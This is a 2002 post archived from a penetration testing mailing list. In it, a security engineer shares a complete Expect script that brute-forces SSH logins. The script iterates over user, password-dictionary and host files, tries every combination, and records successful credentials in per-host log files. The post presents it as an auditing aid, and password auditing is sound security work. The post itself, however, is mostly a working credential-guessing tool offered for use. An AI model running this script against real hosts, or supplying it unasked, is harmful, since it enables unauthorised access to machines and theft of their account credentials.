Penetration Testing mailing list archives

SSh brute forcer


From: James Shanahan <jshanahan () comcastpc com>
Date: 25 Jan 2002 18:07:59 -0000



This is an expect script that will allow you to specify a 
host file, user file, and a dictionary.  Extremely useful 
for auditing large networks where you can't manually 
log into every machine or don't fee like re-running 
something on every host.  Hope everyone finds it 
useful.  

#!/usr/bin/expect -f 
#     
#    Written by James Shanahan
(jshanahan () comcastpc com) 
#    and Erin Palmer(epalmer () comcastpc com) 
#    ssh brute forcer     
#    This will alow you to specify hosts, password 
lists, and a user 
#    I do not take any reponsibilty for what you do with 
this tool 
#    Hopefully it will make your life easier rather then 
making other 
#    peoples lives more difficult! 
     
set timeout 5 
set dictionary [lindex $argv 0] 
set file [lindex $argv 1] 
set user [lindex $argv 2] 

if {[llength $argv] != 3} { 
   puts stderr "Usage: $argv0 <dictionary-file> <hosts-
file> <user-file>\n" 
   exit } 

set tryHost [open $file r] 
set tryPass [open $dictionary r] 
set tryUser [open $user r] 

set passwords [read $tryPass] 
set hosts [read $tryHost] 
set login [read $tryUser] 

foreach username $login { 
foreach passwd $passwords { 
foreach ip $hosts { 
spawn ssh $username@$ip 
expect ":" 
   send "$passwd\n" 
set logFile [open $ip.log a] 
expect "L" { 
puts $logFile "password for $username@$ip is 
$passwd\n" 
close $logFile 
} 
set id [exp_pid] 
exec kill -INT $id   
} 
    } 
} 


James G. Shanahan Jr.
Security Engineer 
Comcast Corporation

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


Current thread: